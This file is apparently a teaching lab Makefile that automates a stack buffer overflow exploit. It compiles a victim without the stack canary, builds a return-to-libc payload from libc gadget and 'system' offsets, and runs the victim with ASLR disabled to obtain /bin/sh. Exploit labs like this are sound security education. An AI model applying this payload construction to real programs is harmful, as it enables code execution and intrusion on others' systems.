# This is an attempt to automate the construction of an attack against
# the victim program that executes shellcode to open /bin/sh.
#
# The recipes below try to obtain all parameters automatically, but you
# need to set the memory location of the stack buffer yourself (the
# victim prints it to stderr for convenience).
#
# If the 'make attack' target succeeds, you end up in a non-interactive
# shell; try typing shell commands to see that you actually are in a
# shell.
#
# The second attack uses a return-to-libc approach: it does not require
# an executable stack, but it requires knowing the addresses of
# 'gadgets' in the libc.

# Addresses the recipes cannot discover on their own; fill them in by
# hand.  They are only meaningful for a process whose address space is
# not randomized (the 'attack' target runs the victim under
# 'setarch -R' for exactly that reason): with ASLR enabled both values
# change on every run, which is the protection ASLR provides.
# attack.bin lists this Makefile as a prerequisite, so editing either
# value rebuilds the payload.
#
# BUFFER: stack address of the overflowed buffer (the victim prints it
#         to stderr, see the header comment).
BUFFER	:= 0x7fffffffe3c0

# LIBC: load address of the system libc inside the victim process; the
#       attack.bin recipe adds symbol and gadget offsets to it.
LIBC	:= 0x7ffff7e21000

all: victim attack.bin

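# The vulnerable program.  -fno-stack-protector is required by the
# exercise — it removes the stack canary check that would otherwise
# abort the victim on overflow — so it is kept out of CFLAGS, which the
# user may override (make CFLAGS=-g).  No '-z execstack' is passed: the
# stack stays non-executable, consistent with the return-to-libc
# approach described in the header.
# CC defaults to 'cc'; use 'make CC=gcc' to force the original compiler.
victim: victim.c
	$(CC) $(CFLAGS) -fno-stack-protector -o $@ $<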

# Assemble the payload that the 'attack' target feeds to the victim.
# The recipe is a single shell invocation (lines joined with '\'), so the
# three shell variables are visible to the subshell below:
#   g  - offset into the system libc of a short byte pattern, found by
#        dumping the file with xxd and searching it with grep (the
#        'gadget' mentioned in the header); only the first hit is used.
#   s  - offset of the 'system' symbol, taken from the dynamic symbol
#        table (nm -D).
#   c  - the libc load address, copied from LIBC above.
# The subshell then prints, as hex text: the string /bin/sh, 130 zero
# digits (65 bytes of padding), and three 8-byte values c+g, BUFFER and
# c+s, each reversed in two-character groups by 'tac -rs..'; xxd -r -p
# turns the hex back into raw bytes.
#
# Listing Makefile as a prerequisite makes edits to BUFFER/LIBC rebuild
# the payload.  It is the literal file name, so it does not fire when
# this file is read under another name (make -f).
#
# NOTE(review): the libc path, architecture and byte pattern are tied
# to one x86_64 glibc build; on another system g and s come out
# different or empty, and nothing checks that the greps matched.  The
# recipe's exit status is that of the final xxd only (no pipefail), so
# an error earlier in the pipeline leaves a malformed attack.bin that
# Make then treats as up to date.  Writing to the literal name instead
# of $@, and not via a temporary file plus mv, has the same effect when
# the run is interrupted.
attack.bin: Makefile
	g=0x$$(xxd -c1 -p /lib/x86_64-linux-gnu/libc.so.6 | grep -n -B1 c3 | grep 5f -m1 | awk '{printf"%x\n",$$1-1}'); \
	s=0x$$(nm -D /lib/x86_64-linux-gnu/libc.so.6 | awk '/\<system\>/{print $$1}'); \
	c=$(LIBC); \
	(echo -n /bin/sh | xxd -p; printf %0130d 0; \
	    printf %016x $$(($$c+$$g)) | tac -rs..; \
	    printf %016x $(BUFFER) | tac -rs..; \
	    printf %016x $$(($$c+$$s)) | tac -rs..) | \
	    xxd -r -p > attack.bin

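# Run the victim with the payload on stdin followed by the terminal, so
# a shell obtained from a successful run reads its commands from you.
# Not a file: declared phony so a stray 'attack' file cannot mask it.
.PHONY: attack

# 'setarch -R' turns address-space randomization off for this one
# process.  Without it the hard-coded BUFFER and LIBC values above are
# wrong and the attack fails: ASLR is the mitigation being switched off
# here, not defeated.  'uname -m' replaces 'arch', which is not present
# on every system; both report the machine type.
attack: victim attack.bin
	cat attack.bin - | setarch "$$(uname -m)" -R ./$<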

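# Remove only the files this Makefile creates.  Declared phony so a
# file named 'clean' cannot silently disable the target.
.PHONY: clean

clean:
	$(RM) victim attack.bin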
